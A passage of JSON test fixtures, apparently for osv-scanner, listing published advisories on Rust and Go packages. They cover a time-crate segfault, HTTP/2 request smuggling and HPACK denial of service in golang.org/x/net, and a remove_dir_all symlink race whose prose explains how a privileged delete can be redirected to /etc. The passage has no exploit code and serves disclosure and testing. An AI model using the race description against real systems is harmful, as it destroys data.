"published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, 
"vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", 
"nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. 
While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", 
"affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ 
{ "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/none/want.json ================================================ { "results": [ { "source": { "path": 
"testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "schema_version": "1.4.0", "id": 
